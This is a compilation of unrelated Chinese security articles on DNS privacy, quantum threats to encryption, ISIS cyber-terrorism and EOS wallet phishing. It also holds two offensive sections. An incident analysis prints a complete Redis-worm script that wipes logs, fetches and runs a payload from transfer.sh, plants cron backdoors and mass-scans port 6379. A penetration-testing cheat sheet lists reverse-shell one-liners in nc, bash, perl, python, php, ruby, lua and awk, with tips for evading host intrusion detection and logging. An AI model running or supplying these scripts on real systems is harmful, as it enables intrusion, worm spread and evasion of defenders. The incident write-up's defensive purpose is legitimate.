如何防御DNS陷阱?常用3种DNS欺骗手法

DNS如何被利用?那么这个系统如何让用户变得脆弱?通常解析器会告诉每个DNS服务器你正在寻找哪个域名。此请求有时会包含您的完整IP地址。或者,如果不是您的完整IP地址,请求中通常会包含您的大部分IP地址,这些IP地址可以轻松地与其他信息结合起来以找出您的身份。

如何防御DNS陷阱?常用3种DNS欺骗手法

以下是防御黑客常用3种DNS欺骗手法:

1. 避免不可靠的解析器

网络可以逃避提供不可靠的解决方案,窃取您的数据或欺骗DNS,因为很少有用户知道风险或如何保护自己。

即使对于了解风险的用户,个人用户也很难与他们的ISP或其他实体进行协商,以确保他们的DNS数据得到负责任的处理。

寻找一个合适的解析器,如果我们有一个可以信赖的解决方案来保护用户的隐私。这意味着Firefox可以忽略网络提供的解析器。安全研究人员表示,有了这个可靠的解析器,我们不必担心流氓解析器出售我们的用户数据或用欺骗性DNS欺骗我们的用户。

如何防御DNS陷阱?常用3种DNS欺骗手法

2. 通过HTTPS使用DNS防止路径上的窃听和篡改

虽然解析器不是唯一的威胁。路径上路由器可以跟踪和欺骗DNS,因为他们可以看到DNS请求和响应的内容。但是互联网已经有了确保路径上路由器不能像这样窃听的技术。这是我之前提到的加密技术。

通过使用HTTPS交换DNS数据包,我们确保没有人能够监视我们用户正在做出的DNS请求。传输尽可能少的数据,以保护用户免受匿名处理。除了提供使用DoH协议进行通信的可信解析器之外,寻找安全DNS服务商,使其更安全。

通常情况下,解析器会将整个域名发送给每个服务器-根DNS,TLD名称服务器,二级名称服务器等。好的DNS服务商。它只会发送与当前正在与之通话的DNS服务器相关的部分。这被称为QNAME最小化。

如何防御DNS陷阱?常用3种DNS欺骗手法

3. 删除域名中没用的解析

解析器通常也会在请求中包含您的IP地址的前24位。这有助于DNS服务器知道您的位置,并选择离您更近的CDN。但是这些信息可以被DNS服务器用来将不同的请求链接在一起。

一些稳定的DNS服务商,是从用户附近的一个IP地址发出请求。这提供了地理位置,而无需将其绑定到特定用户。除此之外,他们正在研究如何以隐私敏感的方式实现更好,形成非常细粒度的负载平衡。

这样做,删除域名中不相关的部分并且不包括您的IP地址,意味着DNS服务器所收集的关于您的数据要少得多,从而更好保护你的隐私。

量子计算网络风暴即将来临

随着技术的不断发展,越来越多的问题得到解决。无线电解决了即时通讯问题;电灯让我们能在日落后继续干活;电脑,互联网带来了许多新机遇。但是科技进步的同时也淘汰了很多旧事物,技术的革命性越强,其破旧功力也越大!

在目前新兴的技术中,要数量子计算的革新性最强,这种革新能力将有如加密技术一样带来一阵强大的技术风暴。

量子计算网络风暴即将来临

量子计算的演变

科幻小说中,量子计算更像是魔法而非科学。因为小说里展现的不是电路,而是主人公操作量子比特的画面。

和如今电脑中电路处理的二进制数据不同,量子比特是叠加存在的,它存在于1到0之间的无限空间。因此,理论上它们似乎可以针对一个问题立即给出所有解决方案,而电脑还必须一次尝试一种可能。

现在唯一阻碍量子计算机发展的就是物理工程学方面的挑战,而政府和私企正在努力克服这一问题。

量子计算威胁加密保护地位

随着量子计算的发展,加密技术以及利用加密技术保护的数字信息都面临着威胁。攻击者利用电脑破解加密文件归根结底只是时间问题。大多数现代加密系统,如 Diffie-Hellman 和 RSA,都是基于一个前提——让黑客计算很长的时间才能找到密钥。

由于量子计算并不按这个套路出牌,它不需要一次一次地进行组合,使用量子比特就可以一次就试遍所有的密码组合,几秒的时间就找出正确密钥。

目前唯一限制量子比特解密速度的是当前量子计算机的数量还有限,这一点已在稳步改善中。

美国国家标准与技术研究院(NIST)科学家意识到了这种威胁,该机构的一份报告明确表示量子计算将为加密技术带来威胁。报告称,如果建立大规模的量子计算机组,就可能破解目前大量公共密钥加密系统。唯一的办法是——现在就给信息安全系统做好抵抗量子计算解密的准备。

攻击者不会等你,潜在的攻击者正在窃取加密数据,他们期望不久的将来用量子计算机给数据解密。现在如果没有合适的数据保护措施,一旦他们有了量子计算工具,就会迅速出现数据泄露的威胁。

当前量子世界的数据保护进展

量子计算机解密的问题仍在不断演变。鲜少有人能完全理解这一问题的影响力,还有一些人则对这种危机浑然不觉,但一些创新者正努力依照 NIST 的推荐,为即将到来的量子风暴做准备。

大部分使用量子计算或量子机制的方案都试图创造一种量子计算机无法解开的锁。因此,“后量子加密术”与典型的“AES 加密术”截然不同。用一个例子来说明:

位于卢森堡的卫星运营商 SES 正致力于创建量子加密电讯系统 Quantum Cryptography Telecommunication System (Quartz),这个系统将成为未来异地分散网络的密钥分配平台。这个基于卫星的 QKD(量子密钥分发)系统利用太空光子来保护密钥。

IBM 研究人员也正在研发一种基于数学格框架(mathematical lattices)的新型加密机制,在这种机制中,数据隐藏于复杂的代数结构中。这一想法旨在阻止量子计算机用其强大的运算功能解密,其原理是在原始问题的后部分出更多复杂的加密层,这样整个数学格框架无法在同一时间被全部看透。

与此同时,一家名为 Quantum Xchange 的公司研发了一种利用 QKD 技术的方法。在这种方法中,密钥基于不可破解的量子现象而生成,目的是创建首个安全保护文件的全国性网络,再将其数据发至任意距离之外。和其他处于研发中的方案不同,Quantum Xchange 网络现在就可用,而且此方案弥补了目前加密术中的一些不足之处。

量子计算的风暴来势汹汹,但目前安全界在保护数据方面并非一无是处。现在投资部署正确的防御,未雨绸缪的人就能在量子风暴中稳稳保护好自己的数据。

ISIS欲发起“孤狼”行动,攻击西方基础设施

E安全7月10日讯 迄今为止,大多数网络恐怖攻击包括篡改目标网站的内容,发布不良信息。然而,据以色列《耶路撒冷邮报》获取的以色列国际反恐研究所(ICT)一份报告指出,伊斯兰网络恐怖分子正在加大力度对西方国家的基础设施发动网络攻击。

ISIS欲发起“孤狼”行动,攻击西方基础设施

重心转移到对基础设施的攻击

研究人员对恐怖组织“伊斯兰国”(ISIS)所支持的黑客的账户进行监控,并在这份报告中讨论了恐怖分子网络行动的几种可能性,例如可能会在网上获取进攻能力以及出于该目的雇佣黑客或从支持恐怖主义的国家处获得援助。

以色列国际反恐研究所(ICT)这份报告指出,网络恐怖主义进攻的另一个趋势是:“‘联合网络哈里发’(UCC)黑客组织的重组。虽然网络恐怖分子2017年初的攻击重点围绕社交网络账户进行,但年底就将重心转移至针对教育机构和关键基础设施的网络攻击。”

报告指出,伊斯兰网络恐怖分子正反击政府和社交媒体巨头对其的限制。Facebook、Twitter 等社交媒体平台最初在清理恐怖主义内容方面有待提升,但过去两年里,Facebook 聘用了大量检查人员负责检查并清理这些内容。圣战分子创建了名为 “Al-Ansar Bank” 的在线支持实体,旨在向账号被删除的用户提供新的身份。

“社交”被封锁,ISIS欲招募更多外国人员

报告指出,加密即时通讯应用程序 Telegram 一度被 ISIS 当作其媒体生命线,圣战分子还创建了独立的平台并开辟了各种通信渠道。“基地组织“建立了专门的粘贴站点,其中包含圣战内容的链接,其用户可通过密码或邀请链接访问该站点。

自2017年10月在拉卡(Raqqah)失利之后,ISIS 的宣传能力被削弱。报告指出,就网络宣传方面而言,ISIS 使用信息图表在互联网上发布并宣传了“军事成就”,以此宽慰自身在其他方面的损失(例如“领地丧失”、头领丧命,收入大幅下降以及新成员数量减少)。

ISIS 专门开发了应用程序教授儿童学习阿拉伯语,其重点可能是教育“下一代”圣战分子。ISIS 2017年“将西方的流行文化元素纳入宣传内容,称其是综合战略的一部分,以此影响潜在的成员。ISIS 利用媒体和互联网的做法在影响穆斯林青年(在西方出生并接受教育)方面发挥了重要的作用。”

ISIS 已尝试整合媒体集团来恢复媒体系统,以简化开发和宣传过程,并且还扩宽了对互联网平台的多样性利用方式,将重点放在加密平台上,旨在通过网络宣传鼓动在西方发起“孤狼”攻击,鼓励在菲律宾和阿富汗招募更多外国人员。

ISIS欲发起“孤狼”行动,攻击西方基础设施

报告指出,这种趋势是国家和企业采取限制措施遏制社交平台用于恐怖主义目的所形成的,网络恐怖分子的逆反应。

此外,为了更好地防御西方情报机构的网络入侵,恐怖组织现已开始散布各种指南、说明和更新,以抵御西方情报机构的恶意软件和在线追踪能力。

众筹网站也有“妙用”

以色列国际反恐研究所(ICT)过去也曾发布报告指出,网络恐怖分子侧重于使用比特币,而这份报告揭露了他们在加大使用众筹网站。

网络恐怖分子的众筹活动 “更多涉及到女性为囚犯子女筹集资金或拯救清真寺免遭破坏”,而“数字货币与军事融资有关,即筹集资金购买武器和军火。”

另外,这份报告还总结了新的法律、国际执法机构合作和跨国公司在打击网络恐怖主义宣传方面的合作。

E安全注:本文系E安全独家编译报道,转载请联系授权,并保留出处与链接,不得删减内容。联系方式:① 微信号zhu-geliang ②邮箱[email protected]
@E安全,最专业的前沿网络安全媒体和产业服务平台,每日提供优质全球网络安全资讯与深度思考,欢迎关注微信公众号「E安全」(EAQapp),或登E安全门户网站www.easyaq.com , 查看更多精彩内容。

不懂EOS账户机制被盗币,注册账户前要先搞懂这些

最近因为EOS内存价格暴涨以及交易所陆续开放EOS充提,许多用户开始注册EOS账户参与进来。但EOS的账户机制不同于比特币和以太坊,许多不熟悉的持币用户因此遭遇钓鱼或诈骗,造成巨额损失。这篇文章就为大家科普一下EOS账户机制和提升账户安全的知识。

什么是公钥、私钥、助记词?

我们首先介绍下使用加密币钱包经常会遇到的几个东西:地址、公钥、私钥、助记词、Keystore。

他们的关系:

公钥=地址=银行卡号

私钥=助记词=Keystore+密码=银行卡号+银行卡密码

Keystore是以太坊账户体系专有的,EOS账户体系中没有。

EOS账号有两把私钥

用过比特币或以太坊钱包的都知道,每个账户会有一个地址/公钥,以及与其对应的私钥。地址/公钥作为标识,用来接收转账或者在区块链浏览器查询账户交易记录等信息;私钥可以进行恢复账户、重置密码等操作。

但是,在EOS账户体系中,必须要打破这样的思维。因为每个EOS账号都有两个不同权限的私钥。

EOS账户构成:账户名+Active权限+Owner权限

账户名

由12个字符组成的唯一名称,可以自定义。少于12位的账户必须通过系统拍卖获得。

账户名可使用字符:12345abcdefghijklmnopqrstuvwxyz

EOS账户名相当于以太坊的地址,可以用来接收转账或者在区块链浏览器查询账户交易记录等信息。

Active权限

包括一对Active公钥和私钥。Active即操作权,该权限可以用于转账、投票等日常操作。

Owner权限

包括一对Owner公钥和私钥。Owner即所有权,是账户最高权限,可以用于重置Active私钥。

可以在EOS区块链浏览器中通过用户名查询账户的Owner权限和Active权限的公钥。下图是通过 https://eospark.com/MainNet/account 查询的某账户Owner公钥和Active公钥,每个公钥都有对应的私钥。

不懂EOS账户机制被盗币,注册账户前要先搞懂这些

单私钥模式和双私钥模式

单私钥模式即Owner权限和 Active权限使用同一把私钥。之前映射所提供的私钥就是单私钥模式。目前市面上大部分支持EOS的钱包都采用的是单私钥模式。这样虽然相对简单,只需要备份一把私钥,但是并不安全。

单私钥模式注册的账户:

不懂EOS账户机制被盗币,注册账户前要先搞懂这些

建议有条件的用户尽量采用双私钥模式注册账户。也就是有两个私钥两套助记词。

谨防钓鱼和诈骗

由于注册EOS账户需要已经存在的账户帮忙抵押内存,所以最近常见的钓鱼手法是热心帮忙注册账户。

虽然对方会让用户自己生成公钥和私钥,并且只需要用户提供公钥。但是由于EOS账号有两把私钥,钓鱼者把用户提供的公钥设置为Active权限公钥,把自己的公钥偷偷设置为Owner权限公钥,然后等用户向这个账号里转入EOS资产后,钓鱼者就用自己控制的Owner权限来控制用户的账户,转移EOS资产。

下面就是一位最近被钓鱼的案例:通过他人和第三方工具注册账号导致账户被盗。目前该用户正在寻求社区帮助,还未确定账号被盗的确切原因。

不懂EOS账户机制被盗币,注册账户前要先搞懂这些

防止这种钓鱼的方法:

1.通过可信的渠道注册账号。如可信的EOS钱包或者信任的人,千万不要通过来路不明的个人或者第三方工具注册钱包。

2.如果是他人帮忙注册的账号,在账号注册之后仔细检查Owner权限和Active权限的公钥(可通过 https://eospark.com/MainNet/account 输入账户名查询),如果不是自己提供的公钥,立即停止使用该账户,在确信账户安全前千万不要转入任何EOS资产。

3.妥善保管Owner权限和Active权限的私钥,不要在不信任的地方导入私钥,不要对私钥进行复制粘贴、聊天发送等敏感操作。

虽然EOS和比特币、以太坊的账户体系不一样,但是EOS账户一旦被盗,资产追回的难度同样极大,所以注册和使用账户一定要小心谨慎。

关于更多EOS资讯请点点关注!

记一次朋友服务器被黑的分析处理全过程

刚刚一关系不错的朋友在群里求助

记一次朋友服务器被黑的分析处理全过程

记一次朋友服务器被黑的分析处理全过程

向他要了服务器密码后登上去看了眼,发现被挖矿了。。

记一次朋友服务器被黑的分析处理全过程

结束掉这个进程后发现没有死灰复燃,继续查。

接着在root目录下发现了大量的隐藏文件。。

记一次朋友服务器被黑的分析处理全过程

查了下最近登陆和执行过的命令,没发现异常,由于服务器有redis,猜测是redis爆破进来的,跟他核实了下,他竟然没给redis加密码。。。

记一次朋友服务器被黑的分析处理全过程

XFTP连上后显示隐藏文件,发现了几个可疑的脚本,下载回本地后分析

先从文件名最怪的脚本看起

记一次朋友服务器被黑的分析处理全过程

脚本内容如下:

sleep 1find . -maxdepth 1 -name ".mxff0" -type f -mmin +60 -delete[ -f .mxff0 ] && exit 0echo 0 > .mxff0trap "rm -rf .m* .cmd tmp.* .r .dat $0" EXITsetenforce 0 2>/dev/nullecho SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/nullcrontab -r 2>/dev/nullrm -rf /var/spool/cron 2>/dev/nullgrep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.confrm -rf /tmp/* 2>/dev/nullrm -rf /var/tmp/* 2>/dev/nullrm -rf /etc/root.sh 2>/dev/nullsync && echo 3 > /proc/sys/vm/drop_cachescat < /etc/security/limits.conf* hard nofile 100000* soft nofile 100000root hard nofile 100000root soft nofile 100000* hard nproc 100000* soft nproc 100000root hard nproc 100000root soft nproc 100000EOFiptables -I INPUT 1 -p tcp --dport 6379 -j DROPiptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPTps xf | grep -v grep | grep "redis-server/|nicehash/|linuxs/|linuxl/|crawler.weibo/|243/44444/|cryptonight/|stratum/|gpg-daemon/|jobs.flu.cc/|nmap/|cranberry/|start.sh/|watch.sh/|krun.sh/|killTop.sh/|cpuminer/|/60009/|ssh_deny.sh/|clean.sh/|/./over/|mrx1/|redisscan/|ebscan/|redis-cli/|barad_agent/|/.sr0/|clay/|udevs/|/.sshd/|/tmp/init" | while read pid _; do kill -9 "$pid"; donerm -rf /tmp/* 2>/dev/nullrm -rf /var/tmp/* 2>/dev/nullecho 0 > /var/spool/mail/rootecho 0 > /var/log/wtmpecho 0 > /var/log/secureecho 0 > /root/.bash_historyYUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget"DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl"if cat /etc/*release | grep -i CentOS; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Red; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Fedora; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Ubuntu; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update -q --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Debian; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Mint; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Knoppix; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelseexit 1fisleep 1if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); thencurl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12sleep 1[ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112fitname=$( mktemp )OMURL=https://transfer.sh/ly9S0/tmp.5ErvacTPRmcurl -s $OMURL > $tname || wget -q -O $tname $OMURLNMURL=$( curl -s --upload-file $tname https://transfer.sh )mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg[ -z "$NMURL" ] && NMURL=$OMURLncmd=$(basename $(mktemp))sed s|"$OMURL"|"$NMURL"|g < .cmd > $ncmdNSURL=$( curl -s --upload-file $ncmd https://transfer.sh )echo flushall > .datecho config set dir /var/spool/cron >> .datecho config set dbfilename root >> .datecho set Backup1 "/t/n*/2 * * * * curl -s ${NSURL} > .cmd && bash .cmd/n/t" >> .datecho set Backup2 "/t/n*/5 * * * * wget -O .cmd ${NSURL} && bash .cmd/n/t" >> .datecho set Backup3 "/t/n*/10 * * * * lynx -source ${NSURL} > .cmd && bash .cmd/n/t" >> .datecho save >> .datecho config set dir /var/spool/cron/crontabs >> .datecho save >> .datecho exit >> .datpnx=pnscan[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscanfor x in $( seq 1 224 | sort -R ); dofor y in $( seq 0 255 | sort -R ); do$pnx -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a $x.$y.0.0/16 6379 > .r.$x.$y.oawk /Linux/ {print $1, $3} .r.$x.$y.o > .r.$x.$y.lwhile read -r h p; docat .dat | redis-cli -h $h -p $p --raw &done < .r.$x.$y.ldonedoneecho 0 > /var/spool/mail/root 2>/dev/nullecho 0 > /var/log/wtmp 2>/dev/nullecho 0 > /var/log/secure 2>/dev/nullecho 0 > /root/.bash_history 2>/dev/nullexit 0

这个脚本干了这么几件事:

  1. 检测是否存在别的挖矿程序,有就结束并删除

  2. 设置dns服务器

  3. 修改防火墙规则(由于服务器是centos7,该操作并没有执行成功)

  4. 结束redis等进程

  5. 删除日志(坑爹呢?)

  6. 下载安装iptables等软件

  7. 下载pnscan(一款可以感染IOT设备的蠕虫)

  8. 下载https://transfer.sh/GQCHp/tmp.pZR8v8kihR 并重命名为.gpg然后运行,运行后再删除自身

  9. 设置定时任务

  10. 用pnscan扫描全网6379端口设备

随后执行了 netstat -antp 查看了网络连接

记一次朋友服务器被黑的分析处理全过程

尝试结束掉pnscan发现会重启进程,推测有进程守护

记一次朋友服务器被黑的分析处理全过程

用命令ps -ef|grep pnscan查看pnscan路径

记一次朋友服务器被黑的分析处理全过程

进入到/usr/local/bin目录后执行ls

记一次朋友服务器被黑的分析处理全过程

发现了这个东西静静的躺在那

让我们用rm -rf pnscan送他最后一程

记一次朋友服务器被黑的分析处理全过程

最后一步清理战场

由于/root目录下有大量的.r.x命名比较规则的文件,直接调用正则删除即可

附几个root目录下的脚本:

.cmd[与tmp.Nm1jfFNPap内容一样]:

sleep 1find . -maxdepth 1 -name ".mxff0" -type f -mmin +60 -delete[ -f .mxff0 ] && exit 0echo 0 > .mxff0trap "rm -rf .m* .cmd tmp.* .r .dat $0" EXITsetenforce 0 2>/dev/nullecho SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/nullcrontab -r 2>/dev/nullrm -rf /var/spool/cron 2>/dev/nullgrep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.confrm -rf /tmp/* 2>/dev/nullrm -rf /var/tmp/* 2>/dev/nullrm -rf /etc/root.sh 2>/dev/nullsync && echo 3 > /proc/sys/vm/drop_cachescat < /etc/security/limits.conf* hard nofile 100000* soft nofile 100000root hard nofile 100000root soft nofile 100000* hard nproc 100000* soft nproc 100000root hard nproc 100000root soft nproc 100000EOFiptables -I INPUT 1 -p tcp --dport 6379 -j DROPiptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPTps xf | grep -v grep | grep "redis-server/|nicehash/|linuxs/|linuxl/|crawler.weibo/|243/44444/|cryptonight/|stratum/|gpg-daemon/|jobs.flu.cc/|nmap/|cranberry/|start.sh/|watch.sh/|krun.sh/|killTop.sh/|cpuminer/|/60009/|ssh_deny.sh/|clean.sh/|/./over/|mrx1/|redisscan/|ebscan/|redis-cli/|barad_agent/|/.sr0/|clay/|udevs/|/.sshd/|/tmp/init" | while read pid _; do kill -9 "$pid"; donerm -rf /tmp/* 2>/dev/nullrm -rf /var/tmp/* 2>/dev/nullecho 0 > /var/spool/mail/rootecho 0 > /var/log/wtmpecho 0 > /var/log/secureecho 0 > /root/.bash_historyYUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget"DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl"if cat /etc/*release | grep -i CentOS; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Red; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Fedora; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Ubuntu; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update -q --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Debian; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Mint; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Knoppix; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelseexit 1fisleep 1if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); thencurl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12sleep 1[ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112fitname=$( mktemp )OMURL=https://transfer.sh/GQCHp/tmp.pZR8v8kihRcurl -s $OMURL > $tname || wget -q -O $tname $OMURLNMURL=$( curl -s --upload-file $tname https://transfer.sh )mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg[ -z "$NMURL" ] && NMURL=$OMURLncmd=$(basename $(mktemp))sed s|"$OMURL"|"$NMURL"|g < .cmd > $ncmdNSURL=$( curl -s --upload-file $ncmd https://transfer.sh )echo flushall > .datecho config set dir /var/spool/cron >> .datecho config set dbfilename root >> .datecho set Backup1 "/t/n*/2 * * * * curl -s ${NSURL} > .cmd && bash .cmd/n/t" >> .datecho set Backup2 "/t/n*/5 * * * * wget -O .cmd ${NSURL} && bash .cmd/n/t" >> .datecho set Backup3 "/t/n*/10 * * * * lynx -source ${NSURL} > .cmd && bash .cmd/n/t" >> .datecho save >> .datecho config set dir /var/spool/cron/crontabs >> .datecho save >> .datecho exit >> .datpnx=pnscan[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscanfor x in $( seq 1 224 | sort -R ); dofor y in $( seq 0 255 | sort -R ); do$pnx -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a $x.$y.0.0/16 6379 > .r.$x.$y.oawk /Linux/ {print $1, $3} .r.$x.$y.o > .r.$x.$y.lwhile read -r h p; docat .dat | redis-cli -h $h -p $p --raw &done < .r.$x.$y.ldonedoneecho 0 > /var/spool/mail/root 2>/dev/nullecho 0 > /var/log/wtmp 2>/dev/nullecho 0 > /var/log/secure 2>/dev/nullecho 0 > /root/.bash_history 2>/dev/nullexit 0

.dat[创建定时任务]

flushallconfig set dir /var/spool/cronconfig set dbfilename rootset Backup1 "/t/n*/2 * * * * curl -s https://transfer.sh/ZShKM/tmp.Nm1jfFNPap > .cmd && bash .cmd/n/t"set Backup2 "/t/n*/5 * * * * wget -O .cmd https://transfer.sh/ZShKM/tmp.Nm1jfFNPap && bash .cmd/n/t"set Backup3 "/t/n*/10 * * * * lynx -source https://transfer.sh/ZShKM/tmp.Nm1jfFNPap > .cmd && bash .cmd/n/t"saveconfig set dir /var/spool/cron/crontabssaveexit

加固建议:

  1. 不要将Redis暴露在公网

  2. 如确实需要,将Redis设置高强度密码并通过白名单限制接入

  3. 定期备份、审查服务器日志

作者:Sp4ce

Linux下内网反弹技巧总结与杂谈

通常,在做渗透的时候会“运气好”,碰到某些应用上存在远程命令执行漏洞,近来由于java反序列化和二进制类漏洞的层出不穷,也加持着这种漏洞越发增多。

一般来说,靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发或映射等方式对外,当可以执行命令的服务器能够访问公网(这个要看具体情况,比如需要加载公网资源或者其他需求)时,反连技巧就会派上用场。

反弹技巧总结:

1、NC反弹

Nc 1.1.1.1 8080 -e /bin/bash

2、Bash-socket反弹

/bin/bash -i > /dev/tcp/1.1.1.1/8080 0<&1 2>&1

3、Shell-socket反弹

a) exec 2>&0;0<&196;

exec 196<>/dev/tcp/1.1.1.1/8080;

sh <&196 >&196 2>&196

b) exec 5<>/dev/tcp/1.1.1.1/8080

cat <&5 | while read line; do $line 2>&5 >&5; done[分两句执行]

4、文件管道-nc/telnet反弹

a) rm /tmp/f;mkfifo /tmp/f;

cat /tmp/f|/bin/sh -i 2>&1|nc 1.1.1.1 8080 >/tmp/f

b) rm /tmp/backpipe;

mknod /tmp/backpipe p;/bin/bash 0/tmp/backpipe

c) rm /tmp/backpipe;

mknod /tmp/backpipe p && telnet 1.1.1.1 8080 0/tmp/backpipe

5、Bash-telnet反弹

telnet 1.1.1.1 8080 | /bin/bash | telnet 1.1.1.1 9090 [另一个端口]

6、Socat反弹

socat tcp-connect:1.1.1.1:8080 exec:”bash -li”,pty,stderr,setsid,sigint,sane

7、脚本反弹

a) Perl反弹

1) perl -e use Socket;$i=”1.1.1.1″;$p=8080;

socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));

if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);

open(STDOUT,”>&S”);open(STDERR,”>&S”);

exec(“/bin/sh -i”);};

2) perl -MIO -e $p=fork;

exit,if($p);

$c=new IO::Socket::INET(PeerAddr,”1.1.1.1:8080″);

STDIN->fdopen($c,r);

$~->fdopen($c,w);system$_ while<>;

b) Python反弹

python -c import socket,subprocess,os;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect((“1.1.1.1”,8080));

os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);

p=subprocess.call([“/bin/sh”,”-i”]);

c) PHP反弹

php -r $sock=fsockopen(“1.1.1.1”,8080);

exec(“/bin/sh -i < &3 >&3 2>&3”);

d) ruby反弹

ruby -rsocket -ef=TCPSocket.open(“1.1.1.1”,8080).to_i;

exec sprintf(“/bin/sh -i < &%d >&%d 2>&%d”,f,f,f)

2) ruby -rsocket -e exit if fork;

c=TCPSocket.new(“1.1.1.1″,”8080”);

while(cmd=c.gets);

IO.popen(cmd,”r”)

{|io|c.print io.read}end

e) lua反弹

lua -e “require(socket);

require(os);

t=socket.tcp();

t:connect(1.1.1.1,8080);

os.execute(/bin/sh -i < &3 >&3 2>&3);”

f) tcl反弹

echo set s [socket 1.1.1.1 8080];

while 42 { puts -nonewline $s “shell>”;

flush $s;

gets $s c;

set e “exec $c”;

if {![catch {set r [eval $e]} err]}

{ puts $s $r };

flush $s; };

close $s; | tclsh

g) awk反弹

awk BEGIN {s = “/inet/tcp/0/1.1.1.1/8080”;

while(42) { do{ printf “shell>” |& s;

s |& getline c;

if(c){ while ((c |& getline) > 0) print $0 |& s;

close(c); } }

while(c != “exit”)

close(s); }} /dev/null

8、二进制程序反弹

Socket程序+命令执行,详见metasploit。

杂谈

市面上反弹shell的脚本和程序非常多,拿metasploit来说,可以生产上百种shell,但解码以后无非以上几种,有趣的时候metasploit生成的无论是脚本反弹程序还是二进制反弹程序多数都是自己实现了system_call,而不是调用系统bash或命令之类,看来做的还是很良心的。

值得一提的是,由于大型甲方公司都会有HIDS防护,目前已知的HIDS,要么修改了bash,要么劫持glibc,要么修改系统底层(这种可能性较低,出问题的几率大)。

当你觉得可以反弹shell的时候一定要提前识别好环境,不然执行了一个bash –i 或nc ,很有可能直接被hids一波带走。

比较推荐使用shell内置反弹或脚本类的反弹shell程序,一般的hids不会记录,非常不建议调用系统bash命令产生反弹,起码.bash_history会妥妥把你出卖掉。

内网shell反弹无论在渗透还是在反渗透中都是一个绕过不开的话题,关于反弹shell,其中有几个有趣的问题:

1. 反弹shell的理解:

内网shell反弹的本质是与公网服务器建立连接,并能将公网服务器传输过来的命令执行,并将结果返回,因此反弹shell涉及两个过程网络建立+命令执行,这两个过程都是衡量反弹功能的标准,网络建立要求复杂加密(如msf: meterpreter_reverse_https等),命令执行则要求尽可能绕开hids和相关记录。

